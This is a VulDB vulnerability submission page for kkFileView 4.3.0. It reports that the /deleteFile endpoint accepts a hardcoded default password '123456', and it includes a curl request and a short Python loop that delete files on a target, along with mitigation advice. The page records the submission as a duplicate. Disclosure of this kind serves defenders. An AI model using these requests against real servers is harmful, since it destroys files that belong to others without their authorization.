Submit #665593: kkFileView 4.3.0 Weak Password Requirementsinfo

TitlekkFileView 4.3.0 Weak Password Requirements
Description **Title**: kkFileView 4.3.0 - Weak Authentication in File Deletion Function Leading to Arbitrary File Deletion **Product**: kkFileView **Version**: 4.3.0 --- ### Vulnerability Details #### Description kkFileView version 4.3.0 contains a weak authentication mechanism in the file deletion functionality. The application uses a hardcoded default password "123456" for file deletion operations, which can be easily guessed or brute-forced by attackers. This vulnerability allows unauthenticated remote attackers to delete arbitrary files within the application's file storage directory without proper authorization. #### Technical Details The vulnerability exists in the `/deleteFile` endpoint of the FileController class: **Vulnerable Code Location**: `server/src/main/java/cn/keking/web/controller/FileController.java` ```java @GetMapping("/deleteFile") public ReturnResponse<Object> deleteFile(String fileName,String password) { // ... validation ... if(!ConfigConstants.getPassword().equalsIgnoreCase(password)) { logger.error("删除文件【{}】失败,密码错误!",fileName); return ReturnResponse.failure("删除文件失败,密码错误!"); } // ... file deletion logic ... } ``` **Default Password Configuration**: `server/src/main/config/application.properties` ```properties #删除密码 delete.password = ${KK_DELETE_PASSWORD:123456} ``` **Password Constant**: `server/src/main/java/cn/keking/config/ConfigConstants.java` ```java public static final String DEFAULT_PASSWORD = "123456"; ``` #### Attack Vectors 1. **Direct HTTP Request**: ```bash curl "http://target:8012/deleteFile?fileName=ZGVtby90ZXN0LnBkZg==&password=123456" ``` 2. **Automated Attack Script**: ```python import requests import base64 target = "http://target:8012" files = ["demo/test.pdf", "demo/document.docx"] for file in files: encoded = base64.b64encode(file.encode()).decode() requests.get(f"{target}/deleteFile?fileName={encoded}&password=123456") ``` #### Impact - **Confidentiality**: No direct impact - **Integrity**: High - Attackers can delete uploaded files - **Availability**: Medium - Can disrupt file preview services - **Authentication**: Complete bypass of deletion authorization #### Affected Components - File deletion endpoint: `/deleteFile` - Default configuration files - Password validation logic --- ### Proof of Concept #### Step-by-Step Reproduction 1. Deploy kkFileView 4.3.0 with default configuration 2. Upload a test file using `/fileUpload` endpoint 3. Obtain file list using `/listFiles` endpoint 4. Delete any file using default password "123456": ```bash curl "http://localhost:8012/deleteFile?fileName=ZGVtby90ZXN0LnBkZg==&password=123456" ``` #### Expected Result File deletion should require proper authentication. #### Actual Result Files can be deleted using the weak default password. --- ### Solution #### Immediate Mitigation 1. Change the default password in `application.properties`: ```properties delete.password = strong_unique_password_here ``` 2. Disable file deletion if not required: ```properties file.upload.disable = true ``` #### Recommended Fix 1. Implement proper user authentication system 2. Use strong password policies 3. Add rate limiting to prevent brute-force attacks 4. Implement audit logging for deletion operations 5. Use cryptographically secure tokens instead of passwords #### Code Fix Example ```java // Replace weak password check with proper authentication @GetMapping("/deleteFile") public ReturnResponse<Object> deleteFile(String fileName, HttpServletRequest request) { if (!isAuthenticated(request)) { return ReturnResponse.failure("Authentication required"); } if (!hasDeletePermission(request)) { return ReturnResponse.failure("Insufficient permissions"); } // ... proceed with deletion ... } ```
Source⚠️ https://github.com/rassec2/kkfile/edit/main/4.3kkfile.md
User
 yudeshui (UID 91129)
Submission09/30/2025 09:24 (7 months ago)
Moderation10/19/2025 04:53 (19 days later)
StatusDuplicate
VulDB entry207741 [kkFileView 4.0.0 FileController.java fileName denial of service]
ReasonProduct not identifiable. Please reply with name and website of the affected product.
Points0

PreviousOverviewNext

Do you want to use VulDB in your project?

Use the official API to access entries easily!